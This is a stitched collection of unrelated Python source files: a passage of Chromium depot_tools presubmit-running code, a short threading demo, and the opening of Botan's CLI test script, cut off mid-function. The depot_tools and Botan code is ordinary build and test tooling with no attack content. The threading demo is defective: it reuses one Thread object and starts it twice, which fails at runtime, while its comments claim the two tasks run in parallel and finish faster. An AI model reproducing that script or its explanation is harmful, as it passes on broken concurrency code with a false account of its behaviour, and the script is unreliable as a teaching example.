The old version is the file before any modifications in the user's
workspace, i.e. the "left hand side".
Contents will be empty if the file is a directory or does not exist.
Note: The carriage returns (LF or CR) are stripped off.
"""
return self._diff_cache.GetOldContents(self.LocalPath(),
self._local_root).splitlines()
def NewContents(self):
"""Returns an iterator over the lines in the new version of file.
The new version is the file in the user's workspace, i.e. the "right hand
side".
Contents will be empty if the file is a directory or does not exist.
Note: The carriage returns (LF or CR) are stripped off.
"""
if self._cached_new_contents is None:
self._cached_new_contents = []
try:
self._cached_new_contents = gclient_utils.FileRead(
self.AbsoluteLocalPath(), 'rU').splitlines()
except IOError:
pass # File not found? That's fine; maybe it was deleted.
return self._cached_new_contents[:]
def ChangedContents(self):
"""Returns a list of tuples (line number, line text) of all new lines.
This relies on the scm diff output describing each changed code section
with a line of the form
^@@ <old line num>,<old size> <new line num>,<new size> @@$
"""
if self._cached_changed_contents is not None:
return self._cached_changed_contents[:]
self._cached_changed_contents = []
line_num = 0
for line in self.GenerateScmDiff().splitlines():
m = re.match(r'^@@ [0-9\,\+\-]+ \+([0-9]+)\,[0-9]+ @@', line)
if m:
line_num = int(m.groups(1)[0])
continue
if line.startswith('+') and not line.startswith('++'):
self._cached_changed_contents.append((line_num, line[1:]))
if not line.startswith('-'):
line_num += 1
return self._cached_changed_contents[:]
def __str__(self):
return self.LocalPath()
def GenerateScmDiff(self):
return self._diff_cache.GetDiff(self.LocalPath(), self._local_root)
class GitAffectedFile(AffectedFile):
"""Representation of a file in a change out of a git checkout."""
# Method 'NNN' is abstract in class 'NNN' but is not overridden
# pylint: disable=abstract-method
DIFF_CACHE = _GitDiffCache
def __init__(self, *args, **kwargs):
AffectedFile.__init__(self, *args, **kwargs)
self._server_path = None
self._is_testable_file = None
def IsTestableFile(self):
if self._is_testable_file is None:
if self.Action() == 'D':
# A deleted file is not testable.
self._is_testable_file = False
else:
self._is_testable_file = os.path.isfile(self.AbsoluteLocalPath())
return self._is_testable_file
class Change(object):
"""Describe a change.
Used directly by the presubmit scripts to query the current change being
tested.
Instance members:
tags: Dictionary of KEY=VALUE pairs found in the change description.
self.KEY: equivalent to tags['KEY']
"""
_AFFECTED_FILES = AffectedFile
# Matches key/value (or "tag") lines in changelist descriptions.
TAG_LINE_RE = re.compile(
'^[ \t]*(?P<key>[A-Z][A-Z_0-9]*)[ \t]*=[ \t]*(?P<value>.*?)[ \t]*$')
scm = ''
def __init__(
self, name, description, local_root, files, issue, patchset, author,
upstream=None):
if files is None:
files = []
self._name = name
# Convert root into an absolute path.
self._local_root = os.path.abspath(local_root)
self._upstream = upstream
self.issue = issue
self.patchset = patchset
self.author_email = author
self._full_description = ''
self.tags = {}
self._description_without_tags = ''
self.SetDescriptionText(description)
assert all(
(isinstance(f, (list, tuple)) and len(f) == 2) for f in files), files
diff_cache = self._AFFECTED_FILES.DIFF_CACHE(self._upstream)
self._affected_files = [
self._AFFECTED_FILES(path, action.strip(), self._local_root, diff_cache)
for action, path in files
]
def Name(self):
"""Returns the change name."""
return self._name
def DescriptionText(self):
"""Returns the user-entered changelist description, minus tags.
Any line in the user-provided description starting with e.g. "FOO="
(whitespace permitted before and around) is considered a tag line. Such
lines are stripped out of the description this function returns.
"""
return self._description_without_tags
def FullDescriptionText(self):
"""Returns the complete changelist description including tags."""
return self._full_description
def SetDescriptionText(self, description):
"""Sets the full description text (including tags) to |description|.
Also updates the list of tags."""
self._full_description = description
# From the description text, build up a dictionary of key/value pairs
# plus the description minus all key/value or "tag" lines.
description_without_tags = []
self.tags = {}
for line in self._full_description.splitlines():
m = self.TAG_LINE_RE.match(line)
if m:
self.tags[m.group('key')] = m.group('value')
else:
description_without_tags.append(line)
# Change back to text and remove whitespace at end.
self._description_without_tags = (
'\n'.join(description_without_tags).rstrip())
def RepositoryRoot(self):
"""Returns the repository (checkout) root directory for this change,
as an absolute path.
"""
return self._local_root
def __getattr__(self, attr):
"""Return tags directly as attributes on the object."""
if not re.match(r"^[A-Z_]*$", attr):
raise AttributeError(self, attr)
return self.tags.get(attr)
def BugsFromDescription(self):
"""Returns all bugs referenced in the commit description."""
tags = [b.strip() for b in self.tags.get('BUG', '').split(',') if b.strip()]
footers = git_footers.parse_footers(self._full_description).get('Bug', [])
return sorted(set(tags + footers))
def ReviewersFromDescription(self):
"""Returns all reviewers listed in the commit description."""
# We don't support a "R:" git-footer for reviewers; that is in metadata.
tags = [r.strip() for r in self.tags.get('R', '').split(',') if r.strip()]
return sorted(set(tags))
def TBRsFromDescription(self):
"""Returns all TBR reviewers listed in the commit description."""
tags = [r.strip() for r in self.tags.get('TBR', '').split(',') if r.strip()]
# TODO(agable): Remove support for 'Tbr:' when TBRs are programmatically
# determined by self-CR+1s.
footers = git_footers.parse_footers(self._full_description).get('Tbr', [])
return sorted(set(tags + footers))
# TODO(agable): Delete these once we're sure they're unused.
@property
def BUG(self):
return ','.join(self.BugsFromDescription())
@property
def R(self):
return ','.join(self.ReviewersFromDescription())
@property
def TBR(self):
return ','.join(self.TBRsFromDescription())
def AllFiles(self, root=None):
"""List all files under source control in the repo."""
raise NotImplementedError()
def AffectedFiles(self, include_deletes=True, file_filter=None):
"""Returns a list of AffectedFile instances for all files in the change.
Args:
include_deletes: If false, deleted files will be filtered out.
file_filter: An additional filter to apply.
Returns:
[AffectedFile(path, action), AffectedFile(path, action)]
"""
affected = list(filter(file_filter, self._affected_files))
if include_deletes:
return affected
return [x for x in affected if x.Action() != 'D']
def AffectedTestableFiles(self, include_deletes=None, **kwargs):
"""Return a list of the existing text files in a change."""
if include_deletes is not None:
warn("AffectedTeestableFiles(include_deletes=%s)"
" is deprecated and ignored" % str(include_deletes),
category=DeprecationWarning,
stacklevel=2)
return [x for x in self.AffectedFiles(include_deletes=False, **kwargs) if x.IsTestableFile()]
def AffectedTextFiles(self, include_deletes=None):
"""An alias to AffectedTestableFiles for backwards compatibility."""
return self.AffectedTestableFiles(include_deletes=include_deletes)
def LocalPaths(self):
"""Convenience function."""
return [af.LocalPath() for af in self.AffectedFiles()]
def AbsoluteLocalPaths(self):
"""Convenience function."""
return [af.AbsoluteLocalPath() for af in self.AffectedFiles()]
def RightHandSideLines(self):
"""An iterator over all text lines in "new" version of changed files.
Lists lines from new or modified text files in the change.
This is useful for doing line-by-line regex checks, like checking for
trailing whitespace.
Yields:
a 3 tuple:
the AffectedFile instance of the current file;
integer line number (1-based); and
the contents of the line as a string.
"""
return _RightHandSideLinesImpl(
x for x in self.AffectedFiles(include_deletes=False)
if x.IsTestableFile())
def OriginalOwnersFiles(self):
"""A map from path names of affected OWNERS files to their old content."""
def owners_file_filter(f):
return 'OWNERS' in os.path.split(f.LocalPath())[1]
files = self.AffectedFiles(file_filter=owners_file_filter)
return dict([(f.LocalPath(), f.OldContents()) for f in files])
class GitChange(Change):
_AFFECTED_FILES = GitAffectedFile
scm = 'git'
def AllFiles(self, root=None):
"""List all files under source control in the repo."""
root = root or self.RepositoryRoot()
return subprocess.check_output(
['git', '-c', 'core.quotePath=false', 'ls-files', '--', '.'],
cwd=root).splitlines()
def ListRelevantPresubmitFiles(files, root):
"""Finds all presubmit files that apply to a given set of source files.
If inherit-review-settings-ok is present right under root, looks for
PRESUBMIT.py in directories enclosing root.
Args:
files: An iterable container containing file paths.
root: Path where to stop searching.
Return:
List of absolute paths of the existing PRESUBMIT.py scripts.
"""
files = [normpath(os.path.join(root, f)) for f in files]
# List all the individual directories containing files.
directories = set([os.path.dirname(f) for f in files])
# Ignore root if inherit-review-settings-ok is present.
if os.path.isfile(os.path.join(root, 'inherit-review-settings-ok')):
root = None
# Collect all unique directories that may contain PRESUBMIT.py.
candidates = set()
for directory in directories:
while True:
if directory in candidates:
break
candidates.add(directory)
if directory == root:
break
parent_dir = os.path.dirname(directory)
if parent_dir == directory:
# We hit the system root directory.
break
directory = parent_dir
# Look for PRESUBMIT.py in all candidate directories.
results = []
for directory in sorted(list(candidates)):
try:
for f in os.listdir(directory):
p = os.path.join(directory, f)
if os.path.isfile(p) and re.match(
r'PRESUBMIT.*\.py$', f) and not f.startswith('PRESUBMIT_test'):
results.append(p)
except OSError:
pass
logging.debug('Presubmit files: %s', ','.join(results))
return results
class GetTryMastersExecuter(object):
@staticmethod
def ExecPresubmitScript(script_text, presubmit_path, project, change):
"""Executes GetPreferredTryMasters() from a single presubmit script.
Args:
script_text: The text of the presubmit script.
presubmit_path: Project script to run.
project: Project name to pass to presubmit script for bot selection.
Return:
A map of try masters to map of builders to set of tests.
"""
context = {}
try:
exec(script_text, context)
except Exception as e:
raise PresubmitFailure('"%s" had an exception.\n%s'
% (presubmit_path, e))
function_name = 'GetPreferredTryMasters'
if function_name not in context:
return {}
get_preferred_try_masters = context[function_name]
if not len(inspect.getargspec(get_preferred_try_masters)[0]) == 2:
raise PresubmitFailure(
'Expected function "GetPreferredTryMasters" to take two arguments.')
return get_preferred_try_masters(project, change)
class GetPostUploadExecuter(object):
@staticmethod
def ExecPresubmitScript(script_text, presubmit_path, cl, change):
"""Executes PostUploadHook() from a single presubmit script.
Args:
script_text: The text of the presubmit script.
presubmit_path: Project script to run.
cl: The Changelist object.
change: The Change object.
Return:
A list of results objects.
"""
context = {}
try:
exec(script_text, context)
except Exception as e:
raise PresubmitFailure('"%s" had an exception.\n%s'
% (presubmit_path, e))
function_name = 'PostUploadHook'
if function_name not in context:
return {}
post_upload_hook = context[function_name]
if not len(inspect.getargspec(post_upload_hook)[0]) == 3:
raise PresubmitFailure(
'Expected function "PostUploadHook" to take three arguments.')
return post_upload_hook(cl, change, OutputApi(False))
def _MergeMasters(masters1, masters2):
"""Merges two master maps. Merges also the tests of each builder."""
result = {}
for (master, builders) in itertools.chain(iter(masters1.items()),
iter(masters2.items())):
new_builders = result.setdefault(master, {})
for (builder, tests) in builders.items():
new_builders.setdefault(builder, set([])).update(tests)
return result
def DoGetTryMasters(change,
changed_files,
repository_root,
default_presubmit,
project,
verbose,
output_stream):
"""Get the list of try masters from the presubmit scripts.
Args:
changed_files: List of modified files.
repository_root: The repository root.
default_presubmit: A default presubmit script to execute in any case.
project: Optional name of a project used in selecting trybots.
verbose: Prints debug info.
output_stream: A stream to write debug output to.
Return:
Map of try masters to map of builders to set of tests.
"""
presubmit_files = ListRelevantPresubmitFiles(changed_files, repository_root)
if not presubmit_files and verbose:
output_stream.write("Warning, no PRESUBMIT.py found.\n")
results = {}
executer = GetTryMastersExecuter()
if default_presubmit:
if verbose:
output_stream.write("Running default presubmit script.\n")
fake_path = os.path.join(repository_root, 'PRESUBMIT.py')
results = _MergeMasters(results, executer.ExecPresubmitScript(
default_presubmit, fake_path, project, change))
for filename in presubmit_files:
filename = os.path.abspath(filename)
if verbose:
output_stream.write("Running %s\n" % filename)
# Accept CRLF presubmit script.
presubmit_script = gclient_utils.FileRead(filename, 'rU')
results = _MergeMasters(results, executer.ExecPresubmitScript(
presubmit_script, filename, project, change))
# Make sets to lists again for later JSON serialization.
for builders in results.values():
for builder in builders:
builders[builder] = list(builders[builder])
if results and verbose:
output_stream.write('%s\n' % str(results))
return results
def DoPostUploadExecuter(change,
cl,
repository_root,
verbose,
output_stream):
"""Execute the post upload hook.
Args:
change: The Change object.
cl: The Changelist object.
repository_root: The repository root.
verbose: Prints debug info.
output_stream: A stream to write debug output to.
"""
presubmit_files = ListRelevantPresubmitFiles(
change.LocalPaths(), repository_root)
if not presubmit_files and verbose:
output_stream.write("Warning, no PRESUBMIT.py found.\n")
results = []
executer = GetPostUploadExecuter()
# The root presubmit file should be executed after the ones in subdirectories.
# i.e. the specific post upload hooks should run before the general ones.
# Thus, reverse the order provided by ListRelevantPresubmitFiles.
presubmit_files.reverse()
for filename in presubmit_files:
filename = os.path.abspath(filename)
if verbose:
output_stream.write("Running %s\n" % filename)
# Accept CRLF presubmit script.
presubmit_script = gclient_utils.FileRead(filename, 'rU')
results.extend(executer.ExecPresubmitScript(
presubmit_script, filename, cl, change))
output_stream.write('\n')
if results:
output_stream.write('** Post Upload Hook Messages **\n')
for result in results:
result.handle(output_stream)
output_stream.write('\n')
return results
class PresubmitExecuter(object):
def __init__(self, change, committing, verbose,
gerrit_obj, dry_run=None, thread_pool=None, parallel=False):
"""
Args:
change: The Change object.
committing: True if 'git cl land' is running, False if 'git cl upload' is.
gerrit_obj: provides basic Gerrit codereview functionality.
dry_run: if true, some Checks will be skipped.
parallel: if true, all tests reported via input_api.RunTests for all
PRESUBMIT files will be run in parallel.
"""
self.change = change
self.committing = committing
self.gerrit = gerrit_obj
self.verbose = verbose
self.dry_run = dry_run
self.more_cc = []
self.thread_pool = thread_pool
self.parallel = parallel
def ExecPresubmitScript(self, script_text, presubmit_path):
"""Executes a single presubmit script.
Args:
script_text: The text of the presubmit script.
presubmit_path: The path to the presubmit file (this will be reported via
input_api.PresubmitLocalPath()).
Return:
A list of result objects, empty if no problems.
"""
# Change to the presubmit file's directory to support local imports.
main_path = os.getcwd()
os.chdir(os.path.dirname(presubmit_path))
# Load the presubmit script into context.
input_api = InputApi(self.change, presubmit_path, self.committing,
self.verbose, gerrit_obj=self.gerrit,
dry_run=self.dry_run, thread_pool=self.thread_pool,
parallel=self.parallel)
output_api = OutputApi(self.committing)
context = {}
try:
exec(script_text, context)
except Exception as e:
raise PresubmitFailure('"%s" had an exception.\n%s' % (presubmit_path, e))
# These function names must change if we make substantial changes to
# the presubmit API that are not backwards compatible.
if self.committing:
function_name = 'CheckChangeOnCommit'
else:
function_name = 'CheckChangeOnUpload'
if function_name in context:
try:
context['__args'] = (input_api, output_api)
logging.debug('Running %s in %s', function_name, presubmit_path)
result = eval(function_name + '(*__args)', context)
logging.debug('Running %s done.', function_name)
self.more_cc.extend(output_api.more_cc)
finally:
list(map(os.remove, input_api._named_temporary_files))
if not (isinstance(result, tuple) or
isinstance(result, list)):
raise PresubmitFailure(
'Presubmit functions must return a tuple or list')
for item in result:
if not isinstance(item, OutputApi.PresubmitResult):
raise PresubmitFailure(
'All presubmit results must be of types derived from '
'output_api.PresubmitResult')
else:
result = () # no error since the script doesn't care about current event.
# Return the process to the original working directory.
os.chdir(main_path)
return result
def DoPresubmitChecks(change,
committing,
verbose,
output_stream,
input_stream,
default_presubmit,
may_prompt,
gerrit_obj,
dry_run=None,
parallel=False):
"""Runs all presubmit checks that apply to the files in the change.
This finds all PRESUBMIT.py files in directories enclosing the files in the
change (up to the repository root) and calls the relevant entrypoint function
depending on whether the change is being committed or uploaded.
Prints errors, warnings and notifications. Prompts the user for warnings
when needed.
Args:
change: The Change object.
committing: True if 'git cl land' is running, False if 'git cl upload' is.
verbose: Prints debug info.
output_stream: A stream to write output from presubmit tests to.
input_stream: A stream to read input from the user.
default_presubmit: A default presubmit script to execute in any case.
may_prompt: Enable (y/n) questions on warning or error. If False,
any questions are answered with yes by default.
gerrit_obj: provides basic Gerrit codereview functionality.
dry_run: if true, some Checks will be skipped.
parallel: if true, all tests specified by input_api.RunTests in all
PRESUBMIT files will be run in parallel.
Warning:
If may_prompt is true, output_stream SHOULD be sys.stdout and input_stream
SHOULD be sys.stdin.
Return:
A PresubmitOutput object. Use output.should_continue() to figure out
if there were errors or warnings and the caller should abort.
"""
old_environ = os.environ
try:
# Make sure python subprocesses won't generate .pyc files.
os.environ = os.environ.copy()
os.environ['PYTHONDONTWRITEBYTECODE'] = '1'
output = PresubmitOutput(input_stream, output_stream)
if committing:
output.write("Running presubmit commit checks ...\n")
else:
output.write("Running presubmit upload checks ...\n")
start_time = time.time()
presubmit_files = ListRelevantPresubmitFiles(
change.AbsoluteLocalPaths(), change.RepositoryRoot())
if not presubmit_files and verbose:
output.write("Warning, no PRESUBMIT.py found.\n")
results = []
thread_pool = ThreadPool()
executer = PresubmitExecuter(change, committing, verbose,
gerrit_obj, dry_run, thread_pool)
if default_presubmit:
if verbose:
output.write("Running default presubmit script.\n")
fake_path = os.path.join(change.RepositoryRoot(), 'PRESUBMIT.py')
results += executer.ExecPresubmitScript(default_presubmit, fake_path)
for filename in presubmit_files:
filename = os.path.abspath(filename)
if verbose:
output.write("Running %s\n" % filename)
# Accept CRLF presubmit script.
presubmit_script = gclient_utils.FileRead(filename, 'rU')
results += executer.ExecPresubmitScript(presubmit_script, filename)
results += thread_pool.RunAsync()
output.more_cc.extend(executer.more_cc)
errors = []
notifications = []
warnings = []
for result in results:
if result.fatal:
errors.append(result)
elif result.should_prompt:
warnings.append(result)
else:
notifications.append(result)
output.write('\n')
for name, items in (('Messages', notifications),
('Warnings', warnings),
('ERRORS', errors)):
if items:
output.write('** Presubmit %s **\n' % name)
for item in items:
item.handle(output)
output.write('\n')
total_time = time.time() - start_time
if total_time > 1.0:
output.write("Presubmit checks took %.1fs to calculate.\n\n" % total_time)
if errors:
output.fail()
elif warnings:
output.write('There were presubmit warnings. ')
if may_prompt:
output.prompt_yes_no('Are you sure you wish to continue? (y/N): ')
else:
output.write('Presubmit checks passed.\n')
global _ASKED_FOR_FEEDBACK
# Ask for feedback one time out of 5.
if (len(results) and random.randint(0, 4) == 0 and not _ASKED_FOR_FEEDBACK):
output.write(
'Was the presubmit check useful? If not, run "git cl presubmit -v"\n'
'to figure out which PRESUBMIT.py was run, then run git blame\n'
'on the file to figure out who to ask for help.\n')
_ASKED_FOR_FEEDBACK = True
return output
finally:
os.environ = old_environ
def ScanSubDirs(mask, recursive):
if not recursive:
return [x for x in glob.glob(mask) if x not in ('.svn', '.git')]
results = []
for root, dirs, files in os.walk('.'):
if '.svn' in dirs:
dirs.remove('.svn')
if '.git' in dirs:
dirs.remove('.git')
for name in files:
if fnmatch.fnmatch(name, mask):
results.append(os.path.join(root, name))
return results
def ParseFiles(args, recursive):
logging.debug('Searching for %s', args)
files = []
for arg in args:
files.extend([('M', f) for f in ScanSubDirs(arg, recursive)])
return files
def load_files(options, args):
"""Tries to determine the SCM."""
files = []
if args:
files = ParseFiles(args, options.recursive)
change_scm = scm.determine_scm(options.root)
if change_scm == 'git':
change_class = GitChange
upstream = options.upstream or None
if not files:
files = scm.GIT.CaptureStatus([], options.root, upstream)
else:
logging.info('Doesn\'t seem under source control. Got %d files', len(args))
if not files:
return None, None
change_class = Change
return change_class, files
@contextlib.contextmanager
def canned_check_filter(method_names):
filtered = {}
try:
for method_name in method_names:
if not hasattr(presubmit_canned_checks, method_name):
logging.warn('Skipping unknown "canned" check %s' % method_name)
continue
filtered[method_name] = getattr(presubmit_canned_checks, method_name)
setattr(presubmit_canned_checks, method_name, lambda *_a, **_kw: [])
yield
finally:
for name, method in filtered.items():
setattr(presubmit_canned_checks, name, method)
def main(argv=None):
parser = optparse.OptionParser(usage="%prog [options] <files...>",
version="%prog " + str(__version__))
parser.add_option("-c", "--commit", action="store_true", default=False,
help="Use commit instead of upload checks")
parser.add_option("-u", "--upload", action="store_false", dest='commit',
help="Use upload instead of commit checks")
parser.add_option("-r", "--recursive", action="store_true",
help="Act recursively")
parser.add_option("-v", "--verbose", action="count", default=0,
help="Use 2 times for more debug info")
parser.add_option("--name", default='no name')
parser.add_option("--author")
parser.add_option("--description", default='')
parser.add_option("--issue", type='int', default=0)
parser.add_option("--patchset", type='int', default=0)
parser.add_option("--root", default=os.getcwd(),
help="Search for PRESUBMIT.py up to this directory. "
"If inherit-review-settings-ok is present in this "
"directory, parent directories up to the root file "
"system directories will also be searched.")
parser.add_option("--upstream",
help="Git only: the base ref or upstream branch against "
"which the diff should be computed.")
parser.add_option("--default_presubmit")
parser.add_option("--may_prompt", action='store_true', default=False)
parser.add_option("--skip_canned", action='append', default=[],
help="A list of checks to skip which appear in "
"presubmit_canned_checks. Can be provided multiple times "
"to skip multiple canned checks.")
parser.add_option("--dry_run", action='store_true',
help=optparse.SUPPRESS_HELP)
parser.add_option("--gerrit_url", help=optparse.SUPPRESS_HELP)
parser.add_option("--gerrit_fetch", action='store_true',
help=optparse.SUPPRESS_HELP)
parser.add_option('--parallel', action='store_true',
help='Run all tests specified by input_api.RunTests in all '
'PRESUBMIT files in parallel.')
options, args = parser.parse_args(argv)
if options.verbose >= 2:
logging.basicConfig(level=logging.DEBUG)
elif options.verbose:
logging.basicConfig(level=logging.INFO)
else:
logging.basicConfig(level=logging.ERROR)
change_class, files = load_files(options, args)
if not change_class:
parser.error('For unversioned directory, <files> is not optional.')
logging.info('Found %d file(s).', len(files))
gerrit_obj = None
if options.gerrit_url and options.gerrit_fetch:
assert options.issue and options.patchset
gerrit_obj = GerritAccessor(urllib.parse.urlparse(options.gerrit_url).netloc)
options.author = gerrit_obj.GetChangeOwner(options.issue)
options.description = gerrit_obj.GetChangeDescription(options.issue,
options.patchset)
logging.info('Got author: "%s"', options.author)
logging.info('Got description: """\n%s\n"""', options.description)
try:
with canned_check_filter(options.skip_canned):
results = DoPresubmitChecks(
change_class(options.name,
options.description,
options.root,
files,
options.issue,
options.patchset,
options.author,
upstream=options.upstream),
options.commit,
options.verbose,
sys.stdout,
sys.stdin,
options.default_presubmit,
options.may_prompt,
gerrit_obj,
options.dry_run,
options.parallel)
return not results.should_continue()
except PresubmitFailure as e:
print(e, file=sys.stderr)
print('Maybe your depot_tools is out of date?', file=sys.stderr)
return 2
if __name__ == '__main__':
fix_encoding.fix_encoding()
try:
sys.exit(main())
except KeyboardInterrupt:
sys.stderr.write('interrupted\n')
sys.exit(2)
|
threading_test.py | import threading
def calc_square(number, iter):
for _ in range(iter):
print('Square:' , number * number)
def calc_quad(number, iter):
for _ in range(iter):
print('Quad:' , number * number * number * number)
if __name__ == "__main__":
number = 7
thread1 = threading.Thread(target=calc_quad, args=(number, 100000))
thread2 = thread1
# Will execute both in parallel
thread1.start()
thread2.start()
# Joins threads back to the parent process, which is this
# program
thread1.join()
thread2.join()
# This program reduces the time of execution by running tasks in parallel |
test_cli.py | #!/usr/bin/python
"""
(C) 2018,2019 Jack Lloyd
Botan is released under the Simplified BSD License (see license.txt)
"""
import subprocess
import sys
import os
import logging
import optparse # pylint: disable=deprecated-module
import time
import shutil
import tempfile
import re
import random
import json
import binascii
import multiprocessing
from multiprocessing.pool import ThreadPool
# pylint: disable=global-statement,unused-argument
CLI_PATH = None
TESTS_RUN = 0
TESTS_FAILED = 0
class TestLogHandler(logging.StreamHandler, object):
def emit(self, record):
# Do the default stuff first
super(TestLogHandler, self).emit(record)
if record.levelno >= logging.ERROR:
global TESTS_FAILED
TESTS_FAILED += 1
def setup_logging(options):
if options.verbose:
log_level = logging.DEBUG
elif options.quiet:
log_level = logging.WARNING
else:
log_level = logging.INFO
lh = TestLogHandler(sys.stdout)
lh.setFormatter(logging.Formatter('%(levelname) 7s: %(message)s'))
logging.getLogger().addHandler(lh)
logging.getLogger().setLevel(log_level)
def random_port_number():
return random.randint(1024, 65535)
def test_cli(cmd, cmd_options, expected_output=None, cmd_input=None, expected_stderr=None, use_drbg=True):
global TESTS_RUN
TESTS_RUN += 1
opt_list = []
if isinstance(cmd_options, str):
opt_list = cmd_options.split(' ')
elif isinstance(cmd_options, list):
opt_list = cmd_options
if use_drbg:
fixed_drbg_seed = "802" * 32
drbg_options = ['--rng-type=drbg', '--drbg-seed=' + fixed_drbg_seed]
else:
drbg_options = []
cmdline = [CLI_PATH, cmd] + drbg_options + opt_list
logging.debug("Executing '%s'" % (' '.join([CLI_PATH, cmd] + opt_list)))
stdout = None
stderr = None
if cmd_input is None:
proc = subprocess.Popen(cmdline, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
(stdout, stderr) = proc.communicate()
else:
proc = subprocess.Popen(cmdline, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
(stdout, stderr) = proc.communicate(cmd_input.encode())
if stderr:
if expected_stderr is None:
logging.error("Got output on stderr %s (stdout was %s)", stderr, stdout)
else:
if stderr != expected_stderr:
logging.error("Got output on stderr %s which did not match expected value %s", stderr, expected_stderr)
else:
if expected_stderr is not None:
logging.error('Expected output on stderr but got nothing')
output = stdout.decode('ascii').strip()
if expected_output is not None:
if output != expected_output:
logging.error("Got unexpected output running cmd %s %s", cmd, cmd_options)
logging.info("Output lengths %d vs expected %d", len(output), len(expected_output))
logging.info("Got %s", output)
logging.info("Exp %s", expected_output)
return output
def check_for_command(cmd):
cmdline = [CLI_PATH, 'has_command', cmd]
proc = subprocess.Popen(cmdline)
proc.communicate()
return proc.returncode == 0
def cli_config_tests(_tmp_dir):
prefix = test_cli("config", "prefix")
cflags = test_cli("config", "cflags")
ldflags = test_cli("config", "ldflags")
libs = test_cli("config", "libs")
if len(prefix) < 4 or prefix[0] != '/':
logging.error("Bad prefix %s" % (prefix))
if ("-I%s/include/botan-2" % (prefix)) not in cflags:
logging.error("Bad cflags %s" % (cflags))
if not ldflags.endswith(("-L%s/lib" % (prefix))):
logging.error("Bad ldflags %s" % (ldflags))
if "-lbotan-2" not in libs:
logging.error("Bad libs %s" % (libs))
def cli_help_tests(_tmp_dir):
output = test_cli("help", None, None)
# Maybe test format somehow??
if len(output) < 500:
logging.error("Help output seems very short")
def cli_version_tests(_tmp_dir):
output = test_cli("version", None, None)
version_re = re.compile(r'[0-9]\.[0-9]+\.[0-9]')
if not version_re.match(output):
logging.error("Unexpected version output %s" % (output))
output = test_cli("version", ["--full"], None, None)
version_full_re = re.compile(r'Botan [0-9]\.[0-9]+\.[0-9] \(.* revision .*, distribution .*\)$')
if not version_full_re.match(output):
logging.error("Unexpected version output %s" % (output))
def cli_is_prime_tests(_tmp_dir):
test_cli("is_prime", "5", "5 is probably prime")
test_cli("is_prime", "9", "9 is composite")
test_cli("is_prime", "548950623407687320763", "548950623407687320763 is probably prime")
def cli_gen_prime_tests(_tmp_dir):
test_cli("gen_prime", "64", "15568813029901363163")
test_cli("gen_prime", "128", "287193909494025008847286845478788766073")
def cli_cycle_counter(_tmp_dir):
output = test_cli("cpu_clock", None, None)
if output.startswith('No CPU cycle counter on this machine'):
return
have_clock_re = re.compile(r'Estimated CPU clock [0-9\.]+ (M|G)Hz')
if have_clock_re.match(output):
return
logging.error('Unexpected output from cpu_clock: %s', output)
def cli_entropy_tests(_tmp_dir):
output = test_cli("entropy", ["all"], None)
status_re = re.compile('Polling [a-z0-9_]+ gathered [0-9]+ bytes in [0-9]+ outputs with estimated entropy [0-9]+')
unavail_re = re.compile('Source [a-z0-9_]+ is unavailable')
comp_re = re.compile('Sample from [a-z0-9_]+ was .* compressed from [0-9]+ bytes to [0-9]+ bytes')
output_re = re.compile(r'[A-F0-9]+(...)?')
status_next = True
for line in output.split('\n'):
if comp_re.match(line):
continue
if status_next:
if status_re.match(line) is not None:
status_next = False
elif unavail_re.match(line) is not None:
pass
else:
logging.error('Unexpected status line %s', line)
status_next = False
else:
if output_re.match(line) is None:
logging.error('Unexpected sample line %s', line)
status_next = True
def cli_factor_tests(_tmp_dir):
test_cli("factor", "97", "97: 97")
test_cli("factor", "9753893489562389", "9753893489562389: 21433 455087644733")
test_cli("factor", "12019502040659149507", "12019502040659149507: 3298628633 3643787579")
def cli_mod_inverse_tests(_tmp_dir):
test_cli("mod_inverse", "97 802", "339")
test_cli("mod_inverse", "98 802", "0")
def cli_base64_tests(_tmp_dir):
test_cli("base64_enc", "-", "YmVlcyE=", "bees!")
test_cli("base64_dec", "-", "bees!", "YmVlcyE=")
def cli_base32_tests(_tmp_dir):
test_cli("base32_enc", "-", "MJSWK4ZB", "bees!")
test_cli("base32_dec", "-", "bees!", "MJSWK4ZB")
def cli_base58_tests(_tmp_dir):
test_cli("base58_enc", "-", "C6sRAr4", "bees!")
test_cli("base58_dec", "-", "bees!", "C6sRAr4")
test_cli("base58_enc", ["--check", "-"], "Cjv15cdjaBc", "F00F")
test_cli("base58_dec", ["--check", "-"], "F00F", "Cjv15cdjaBc")
def cli_hex_tests(_tmp_dir):
test_cli("hex_enc", "-", "6265657321", "bees!")
test_cli("hex_dec", "-", "bees!", "6265657321")
def cli_hash_tests(_tmp_dir):
test_cli("hash", "--algo=SHA-256",
"E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855 -", "")
test_cli("hash", "--algo=SHA-256",
"BA7816BF8F01CFEA414140DE5DAE2223B00361A396177A9CB410FF61F20015AD -", "abc")
test_cli("hash", ["--algo=SHA-256", "--format=base64"],
"ungWv48Bz+pBQUDeXa4iI7ADYaOWF3qctBD/YfIAFa0= -", "abc")
test_cli("hash", ["--algo=SHA-224", "--format=base58", "--no-fsname"],
"MuGc8HkSVyJjfMjPM5UQikPToBTzNucEghcGLe", "abc")
test_cli("hash", ["--algo=SHA-224", "--format=base58check", "--no-fsname"],
"3MmfMqgrhemdVa9bDAGfooukbviWtKMBx2xauL2RsyAe", "abc")
def cli_hmac_tests(tmp_dir):
key_file = os.path.join(tmp_dir, 'hmac.key')
test_cli("rng", ["64", "--output=%s" % (key_file)], "")
test_cli("hmac", ["--no-fsname", "--hash=SHA-384", key_file, key_file],
"E3A8529377030B28A7DBDFC50DDEC8E4ECEFB6EA850D95EB785938CD3E3AFEF9EF8B08AF219C1496633193468AB755CB")
def cli_bcrypt_tests(_tmp_dir):
test_cli("gen_bcrypt", "--work-factor=4 s3kr1t",
"$2a$04$0.8G7o08XYwvBBWA3l0WUujtwoGZgGDzVSN8fNkNqXikcK4A3lHPS")
test_cli("check_bcrypt", "s3kr1t $2a$04$gHX4Qg7pDSJuXiPXnmt8leyb.FFzX1Bv4rXwIj2cPSakJ8zNnhIka",
"Password is valid")
test_cli("check_bcrypt", "santa $2a$04$gHX4Qg7pDSJuXiPXnmt8leyb.FFzX1Bv4rXwIj2cPSakJ8zNnhIka",
"Password is NOT valid")
def cli_argon2_tests(_tmp_dir):
password = "s3kr1t"
